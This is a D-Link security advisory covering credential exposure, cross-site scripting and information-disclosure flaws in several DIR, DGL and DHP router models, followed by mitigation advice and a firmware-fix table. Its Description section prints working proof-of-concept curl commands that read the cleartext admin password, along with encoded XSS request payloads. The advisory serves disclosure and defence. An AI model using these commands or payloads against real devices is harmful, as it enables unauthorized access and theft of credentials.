Overview
The DIR-652 / DIR-835 / DIR-855L / DGL-5500 / DHP-1565 contain a flaws allow access without log in and without using the Web-GUI. Using proper formed HTTP requests configuration of the running system can be accessed. Configuration data of the running, including password is stored in text, which may allow a malicious user to find the log in credentials. Please follow the instructions in the Recommendations section to fix these reported vulnerabilities.
References
Kyle Lovett - Reported directly to D-Link via dlink.com, April 19, 2014 - Referening similar vulnerabilities as DAP-1320
- D-Link DAP-1320 Advisory - http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10024
- Author's disclosure on DAP-1320
Description
In order to maintain author's intent of the disclosure please reference the original DAP-1320 disclosure at: http://packetstormsecurity.com/files/126219/D-Link-DAP-1320-Directory-Traver
We have also quoted the disclosure from the author, Kyle Lovett, to avoid any mis-information.
Similar to the DAP-1320, the following three cases were found on a variety of platforms.
1) Clear Text Password - CWE - CWE-316: Cleartext Storage of Sensitive Information
DGL-5500A1
DIR-855L
DIR-835
curl -s http://<IP>/tools_admin.asp/ |awk '/hidden/ &&
/admin_password_tmp/ && /value/ {print $5}'
DIR-652 -auth
DHP-1565 -auth
curl -s http://<IP>/tools_admin.asp/ -u user:|awk '/hidden/ &&
/admin_password_tmp/ && /value/ {print $5}'
-----------------------------------------------------------------------------------
2) Cross Site Scripting - CWE - CWE-79: Improper Neutralization of Input
DIR-855L
DIR-835
DHP-1565
http://<IP>/apply.cgi
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D
DGL-5500
http://<IP>/apply_sec.cgi
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D
-----------------------------------------------------------------------------------
3) Sensitive Information Disclosure - CWE - CWE-200: Information Exposure
DGL-5500A1
DIR-855L
DIR-835
MSB ELF File MSB EM_MIPS Processor
http://IP/cgi/ssi/
http://<IP>:8080/hnap.cgi
Possibly vulnerable to malicious code
curl -s http://<IP>:8080/HNAP1/
DIR-652 -auth
DHP-1565 -auth
Recommendations
All devices on your network should have log-in credentials and if your network has WiFi, please make sure WiFi encryptiion-keys are enabled. Also for devices that cannot notify the owner of a new software updates, check for updates from the devices manufacture.
Immediately update to the fixed firmware referenced in the table below as they are made available. Please continue to monior this page for further updates and disclousres.
D-Link recommend your D-Link router remote network management feature disabled (factory default is disabled) to mitigate a malicious remote user using this vulnerability to exploit your router. If remote network mangement is disabled, a malicious user would require to be on the local network side of the router or have compromised another device on the network that could be used to attack the router.
D-Link recommends all PCs (Window or Mac) are up-to-date and scanned for virus, bots, or other damaging software that could compromise the network they are connected.
WiFi encryption reduces the risk to this vulnerabilty if the device Web-GUI is accessed over WiFi. If WiFi network was encrypted, the malicious user would also need to compromise the WiFi encryption, or PC using the Web-GUI utility, in order to monitor the traffice and intercept the cookie.
The default configuration of D-Link's routers are to provide simple installation, ease of useability, and offer widest interoperability. D-Link Systems (D-Link US) reminds customers to configure their devices specifically to the for security concerns with in their network infrastructure. In General, D-Link Systems (D-Link US) recommends disabling services not being used, changing/securing device log-in credentials, enable WiFi encrytion, monitor the routers log files, and access-lists for your devices so security risks for your entire network are minimized.
Affected Product
|
Model Name
|
HW Version
|
Current FW Version
|
New FW Version for this exploit fix
|
| DIR-652 |
Ax/Bx |
Ax: 1.06b05 and older Bx: 2.0x and older
|
FW: Under Devlopment
(Updated 08/11//2014)
|
|
DIR-835
|
Ax
|
v. 1.04b04 and older
|
FW: Under Development
(Updated 08/11//2014)
|
| DIR-855L |
Ax |
v 1.02b08 and older |
FW: 1.03b01
Release Notes
|
| DGL-5500 |
Ax |
v 1.12b02 and older |
FW: Under Development
(Updated 08/11//2014)
|
| DHP-1565 |
Ax |
v 1.01 and older |
FW: Under Development
(Updated 08/11//2014)
|
Security patch for your D-Link Devices
These firmware updates address the security vulnerabilities in affected D-Link devices. D-Link will update this continually and we strongly recommend all users to install the relevant updates.
As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration.